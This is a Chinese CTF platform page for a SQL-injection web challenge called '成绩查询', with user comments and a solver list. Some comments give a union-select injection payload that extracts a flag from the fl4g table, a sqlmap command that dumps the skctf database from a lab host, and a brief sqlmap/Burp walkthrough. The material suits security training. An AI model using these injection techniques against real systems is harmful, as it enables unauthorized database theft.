成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 12732
提  示:
描  述:
来源山科大ctf
评论
hmlpzm 3月前

kskbl

回复 0

donk6 3月前

胡俊胡俊杰你被捕了

回复 1
jay cat 3月前

熊金卫伤了你的小心脏?

回复 0

jay cat 3月前

都是同龄人,我原本没想降维打击

回复 2

WWls= 3月前

这么简单的注入题还有人用sqlmap别逗我笑了

回复 0
jay cat 3月前

豪到我了

回复 7

298617 3月前

qrb666

回复 1
mzjjkk 3月前

qrb999

回复 0

诗意黎明 3月前

哈吉米南北绿豆,哈哑鼓曼波

回复 1

ljy1997 4月前

说一下我的思路:1、随便输入1查询,发现会返回一个表格,怀疑有sql注入漏洞。 2、然后用kali自带的sqlmap工具,因为这个工具只能扫描.txt文件,所以先用bs抓包改post请求之后保存成txt文件。 3、sqlmap命令扫描,发现的确是sql注入漏洞。 4、结果里有一个ctf的数据库,肯定就在这儿了 5、接着扫描这个skctf发现里面有fl4g这个表。 6、接着扫描,出结果。

回复 4

Galaxies2580 4月前

为什么打不开靶机网址,显示无法访问

回复 0

叶澜 6月前

sqlmap -u "http://171.80.2.169:11993/" --forms -D skctf --dump

回复 0

lovehhh 8月前

1' and 1=2 union select group_concat(skctf_flag),2,3,4 from fl4g;#--

回复 8

WriteUp

image
harry

2 金币

评分(26)

解题动态

yansheng192 攻破了该题 11小时前
luze 攻破了该题 12小时前
king... 攻破了该题 14小时前
bdvipnull 攻破了该题 16小时前
网友飞顺熊 攻破了该题 3天前
cjl1214 攻破了该题 3天前
kokhav 攻破了该题 4天前
levelk007 攻破了该题 4天前
1qq页 攻破了该题 4天前
赖皮蛇 攻破了该题 4天前
兄弟不要颓废 攻破了该题 4天前
我只有两题不会 攻破了该题 5天前
1075220327 攻破了该题 5天前
yt430uu 攻破了该题 5天前
sabgdfiush 攻破了该题 5天前
gysbfff 攻破了该题 5天前
farsight 攻破了该题 5天前
7ovey 攻破了该题 5天前
香克斯呀 攻破了该题 5天前
vb嘎嘎 攻破了该题 5天前
问题反馈